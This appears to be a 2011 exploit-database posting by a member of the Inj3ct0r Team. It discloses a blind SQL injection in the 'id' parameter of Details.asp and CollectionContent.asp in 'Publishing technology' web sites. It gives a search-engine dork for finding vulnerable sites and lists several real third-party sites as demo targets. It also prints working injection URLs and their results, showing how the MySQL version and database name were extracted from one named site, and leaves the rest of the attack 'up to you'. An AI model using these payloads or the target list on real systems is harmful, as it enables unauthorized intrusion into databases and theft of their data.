========================================================= Publishing technology <= BLIND SQL Injection Vulnerabilities =========================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KnocKout member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com [~] HomePage : http://h4x0resec.blogspot.com - http://griadamlar.com [~] Reference : http://h4x0resec.blogspot.com ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Publishing technology |~Price : N/A |~Version : N/A |~Software: www.publishingtechnology.com |~Vulnerability Style : SQL Injection |~Vulnerability Dir : / |~Google Keyword : "Powered by Publishing technology AS" |[~]Date : "24.04.2011" |[~]Tested on : Web Server: Microsoft-IIS/6.0 Powered-by: ASP.NET DB Server: MySQL >=5 ---------------------------------------------------------- Details.asp in 'id' Functions Not Security CollectionContent.asp 'id' Functions Not Security -- Demos. http://www.la4o.net/Details.asp?id=4 http://www.studiemotet.no/details.asp?id=120 http://www.lesliedowney.no/CollectionContent.asp?id=24 http://lesliedowney.no/CollectionContent.asp?id=24 ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============================================================== |{~~~~~~~~ Explotation| Blind SQL Injection~~~~~~~~~~~}| Example Mysql Version? SQL Injecting : http://www.lesliedowney.no/CollectionContent.asp?id=24 and substring(@@version,1,1)=4 {FALSE} SQL Injecting Retry : http://www.lesliedowney.no/CollectionContent.asp?id=24 and substring(@@version,1,1)=5 {TRUE} Database name? SQL Injecting : http://www.lesliedowney.no/CollectionContent.asp?id=24 and lenght((database()))<=6 and 'Inj3ct0r'='Inj3ct0r' Mysql Writes : [MySQL][ODBC 3.51 Driver][mysqld-5.0.17]FUNCTION leslie.lenght does not exist Database Name Found! : "leslie" the rest is up to you exploit. ================================================================ Got a present!! FOR EXPLOIT-DB Lamers.. ::):):):) ............../'' ) ...........,/¯../ ........../..../ .../´¯/'...'/´¯¯`•¸ ./'/.../..../......./¨¯ \ ('(...´...´.... ¯~/'...' ) .\.................'..... / ..'\'...\.......... _.•´ ....\..............( .....\........ --------------------------------------------------------------------- .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ & __ ____/___ __ \___ |_ \/ /___ / / /___ |___ __/___ / _ / __ __ /_/ /__ /| |__ / __ /_/ / __ /| |__ / __ / / /_/ / _ _, _/ _ ___ |_ / _ __ / _ ___ |_ / _ /__ \____/ /_/ |_| /_/ |_|/_/ /_/ /_/ /_/ |_|/_/ /____/ _____ __________ /_______ _________________ __ ___/_ __/_ __ `/__ ___/__ ___/ _(__ ) / /_ / /_/ / _ / _(__ ) /____/ \__/ \__,_/ /_/ /____/ KaCaK - MUS4LLAT - ameN - KnocKout - TechnicaL - Neuromancer - MahseN